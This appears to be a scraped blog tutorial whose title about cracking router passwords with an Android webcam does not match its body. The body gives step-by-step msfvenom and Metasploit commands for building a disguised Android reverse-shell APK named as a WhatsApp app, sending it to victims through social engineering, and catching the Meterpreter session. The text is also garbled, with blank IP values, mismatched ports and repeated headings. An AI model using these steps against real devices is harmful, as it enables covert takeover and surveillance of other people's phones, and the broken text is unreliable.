How To Crack Router Password Using Android As Webcam

03.02.2020by admin

In this article, we’ll be discuss about the exploitation of Android devices such as Tablets/Phones/Emulators etc using one of the most popular exploitation framework called as and MSFvenom. Here, we will use MSFvenom for generating payload and save as an.apk file and setup listener to Metasploit framework using multi handler. Once user/victim download and install the malicious apk then, an attacker can easily get back session on Metasploit.We’re going to be use the latest version of Kali Linux i.e. Kali Linux 2017.1 which you can easily download it form their.

  1. How To Crack Router Password Using Android As Webcam Free
  2. How To Crack Router Password Using Android As Webcam Download

Kali Linux is one of the Debian-based operating systems with several tools aimed at various information security tasks, such as Penetration Testing, Forensics, and Reverse Engineering.In Kali Linux, Metasploit Framework is already installed, with the help of this tool, you can even hack any Windows/Linux Operating System too, it has inbuilt so many payloads and exploits which you can also update by following command i.e. The process to exploit android is very simple and easy to use.Requirements –. Kali Linux 2017.1. USB WLAN (Wireless Adapter). VMware or Virtual Box. An Open PortBefore to start the exploitation of android, you need to connect your Kali Linux with Wireless Network which you are using. After successful connection with your wireless network, note down the IP of wlan0 interface by typing this command:Command: ifconfig wlan0To find IP over Internet, you can use this.Now in first step, you need to create a android backdoor so called as payload in the form of.apk extension.

For creation of this payload, you can use msfvenom by typing this command:Command: msfvenom -p android/meterpreter/reversetcp LHOST= LPORT=444 R whatsapprecorder2017.apkHere, android/meterpreter/reversetcp is the name of the payload we’re going to be use.LHOST is the IP address to which the client is going to connect (your IP address). In this case, our IP address is “”.MSFvenom is the combination of msfpayload and msfencode. Both tools are so extremely useful for generating payloads in various formats and encoding their payloads using various encode modules like shikata encoder etc.Note: In this command, we have used the local address because we are in the local environment. For exploitation over WAN or public network, you have to enter your public IP address in LHOST.To find your public IP, you need to type this command:Command: dig TXT +short also need to enable the on your router for it to work over the internet.

You can also check your public IP by opening.Once your backdoor file is created with msfvenom, you just need to transfer this file to the android device which you want to hack, here you can apply any social engineering method to send your custom built. Apk application over any media like Whatsapp/Facebook etc. Make sure that your application file name pretends to be legitimate.After Successfully created.apk file, we also need to sign certificate because Android mobile devices are not allowing installing apps without the appropriately signed certificate.

Android devices only install the signed.apk files. For signing the apk file, you can use jar signer, keytool and zipalign that we’ll cover in next article.Once the payload has been successfully transferred to the target device, we need to start listening on the specified address and port to exploit the device. For this case, we use Metasploit Framework.To start the metasploit framework, just type “ msfconsole” in your terminal.Now we want to use a payload handler for handling our reverse TCP connection by typing this command “ use multi/handler“.You should now have a prompt which says msf exploit(handler). Now set the payload for android by typing these commands:set PAYLOAD android/meterpreter/reversetcpset LHOST LPORT 443To verify all the things, please type “ show options“. Now to start the handler, type “ run” or “ exploit” in same terminal.As soon as the device executes the payload (opens the app), your Meterpreter terminal should say “ Meterpreter session one opened” or something of that sort.


How To Crack Router Password Using Android As Webcam Free

This means you have successfully gained access to the device.Bingo!!!

How To Crack Router Password Using Android As Webcam Download

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